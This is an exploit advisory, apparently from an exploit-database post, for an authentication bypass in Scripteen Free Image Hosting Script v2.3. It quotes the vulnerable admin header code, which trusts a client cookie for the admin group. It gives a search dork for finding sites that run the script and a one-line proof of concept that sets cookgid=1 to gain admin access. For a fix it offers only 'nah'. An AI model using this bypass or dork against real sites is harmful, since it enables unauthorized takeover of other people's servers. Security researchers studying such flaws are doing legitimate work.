|| || | || o_,_7 _|| . _o_7 _|| q_|_|| o_\\\_, ( : / (_) / ( . ___________________ _/QQQQQQQQQQQQQQQQQQQ\__ __/QQQ/````````````````\QQQ\___ _/QQQQQ/ \QQQQQQ\ /QQQQ/`` ```QQQQ\ /QQQQ/ \QQQQ\ |QQQQ/ By Qabandi \QQQQ| |QQQQ| |QQQQ| |QQQQ| From Kuwait, PEACE... |QQQQ| |QQQQ| |QQQQ| |QQQQ\ iqa[a]hotmail.fr /QQQQ| \QQQQ\ __ /QQQQ/ \QQQQ\ /QQ\_QQQQ/ \QQQQ\ \QQQQQQQ/ \QQQQQ\ /QQQQQ/_ ``\QQQQQ\_____________/QQQ/\QQQQ\_ ``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\ ``````````````````` ````` =Vuln: Scripteen Free Image Hosting Script V2.3 Insecure Cookie Handling =INFO: http://www.scripteen.com/ =BUY: --- =Download: http://www.scripteen.com/forum/news-announcements-f2-scripteen-free-image-hosting-script-v2-3-t631.html =DORK: DORK:"Powered by Scripteen Free Image Hosting Script V 2.3" ____________ _-=/:Conditions:\=-_ ```````````````````````````````````````````````````````````````````````````````` none ---------------------------------------===-------------------------------------- _________________ _-=/:Vulnerable_Code:\=-_ ```````````````````````````````````````````````````````````````````````````````` // in ".\admin\header.php" $userid=$_SESSION['userid']; $usergid=$_SESSION['usergid']; if (!$userid || empty($userid) || $userid==""){ $userid = $_COOKIE['cookid']; $usergid = $_COOKIE['cookgid']; } // this is the scripts authentication code, pasted in all admin files.. fail. if($usergid!="1") { header("Location: logout.php"); exit; } ---------------------------------------===-------------------------------------- _______ _-=/:P.o.C:\=-_ ```````````````````````````````````````````````````````````````````````````````` Set: Cookie: cookgid=1 ---------------------------------------===-------------------------------------- __________ _-=/:SOLUTION:\=-_ ```````````````````````````````````````````````````````````````````````````````` nah ---------------------------------------===-------------------------------------- ______________________________________________________________________________ / \ | ---------------------------------------------------------------------- | \______________________________________________________________________________/ \ No More Private / ````````````````` Salamz to All Muslim Hackers.